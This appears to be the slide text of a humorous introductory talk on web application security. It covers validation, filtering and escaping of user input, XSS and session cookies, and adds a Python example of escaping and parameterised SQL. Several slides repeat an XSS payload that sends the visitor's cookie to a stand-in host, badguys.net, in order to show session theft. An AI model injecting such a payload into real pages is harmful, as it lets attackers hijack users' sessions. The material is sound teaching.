Basic Web Application Security
User Input. Kick Your Arse.
Three Ways (All Awesome)
Validation. Passive (No touchy-touchy)
This is a Number. 2
This is not a Number. a
This is really not a Number. <script>alert('loldongs')</script>
Filtering. Destructive (One-Way Street)
What’s the diff? (Bro.)
What happens when you screw it up?
White-Listing: Usability Problems. Black-Listing: Security Problems. (Always a trade-off.)
Transport: Point A -> Point B
HTML: <b>Huh.</b> -> <p><i><b>Huh.</b></i></p> -> <b>Huh</b>
SQL: Sam O'Brien -> INSERT INTO mah_peeps (name) VALUES ('Sam O\'Brien'); -> 1, Sam O'Brien, 2010-09-02 18:30:00
XSS (Cross-Site Scripting)
SS (XTREME Site Scripting)
Sticking Scripts Where They Don’t Belong. You there, down the back. Stop sniggering.
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Oh shit.
Why is this uncool? (Yeah! Why?)
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Ooooh shit.
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Oooooooooooh shit.
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Oooooooooooooooooh shit.
Why is this really uncool? (Because shut up.)
HTTP Hyper-Text Thingy I-forgot-again
It can guess. (Badly.) IP Address, Browser, User-Agent.
Sends a cookie with each request. (A basket of goodies that the browser sends faithfully every request.)
The Server puts a unique ID in the basket. PHPSESSID=123your456mum789 __utma=12948.23.4211414.5553 is_a_furry=1
Browser sends the ID every request. PHPSESSID=123your456mum789
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Look again.
THEY HAVE YOUR COOKIE. Ooooooooooooooooooooooo-
HTML Validation: Really Hard.
HTML Filtering: Still Really Hard. • Use a library, e.g. HTML Purifier.
HTML Escaping: Dead Easy. Most languages have stuff to handle this, e.g. htmlentities(), cgi.escape(), CGI.escape()
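The three ways side by side, as an added example that is not from the deck: validation that only looks, filtering that throws tags away for good, and escaping that is reversible, run over the deck's own inputs. The sample inputs, table name and function names are constructed for this example; html.escape is used in place of the cgi.escape the deck lists, since cgi.escape was removed in Python 3.8, and the SQL half binds a parameter instead of hand-escaping the apostrophe.

```python
import html
import re
import sqlite3

# Constructed sample inputs, mirroring the deck's slides.
NUMBER = "2"
LETTER = "a"
SCRIPT = "<script>alert('loldongs')</script>"
NAME = "Sam O'Brien"


def validate_number(value: str) -> bool:
    """Validation is passive: look, decide, never modify. Whitelist: digits only."""
    return re.fullmatch(r"-?[0-9]+", value) is not None


def filter_tags(value: str) -> str:
    """Filtering is destructive: the tags are thrown away and cannot be recovered.
    Deliberately naive regex; real HTML is far messier than this, which is why
    the deck says to use a library such as HTML Purifier."""
    return re.sub(r"<[^>]*>", "", value)


def escape_for_html(value: str) -> str:
    """Escaping leaves the data alone and only changes how it is written down
    for the HTML transport. html.escape is the Python 3 replacement for the
    deck's cgi.escape (removed in Python 3.8); quote=True also covers attributes."""
    return html.escape(value, quote=True)


def escape_round_trips(value: str) -> bool:
    """Escaping is reversible, unlike filtering: unescape gives the original back."""
    return html.unescape(escape_for_html(value)) == value


def insert_peep(name: str) -> str:
    """SQL is a different transport with different escaping rules. Here the
    driver binds the value as a parameter, so the apostrophe in Sam O'Brien
    never has to be escaped by hand as in the deck's 'Sam O\\'Brien'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mah_peeps (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO mah_peeps (name) VALUES (?)", (name,))
    return conn.execute("SELECT name FROM mah_peeps").fetchone()[0]


if __name__ == "__main__":
    for v in (NUMBER, LETTER, SCRIPT):
        print(f"validate {v!r}: {validate_number(v)}")  # True, False, False
    print("filtered:", filter_tags(SCRIPT))             # alert('loldongs')
    print("escaped:", escape_for_html(SCRIPT))          # &lt;script&gt;alert(&#x27;loldongs&#x27;)&lt;/script&gt;
    print("reversible:", escape_round_trips(SCRIPT))    # True
    print("stored:", insert_peep(NAME))                 # Sam O'Brien
```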
How hard is filtering? (It’s just <script>, right?)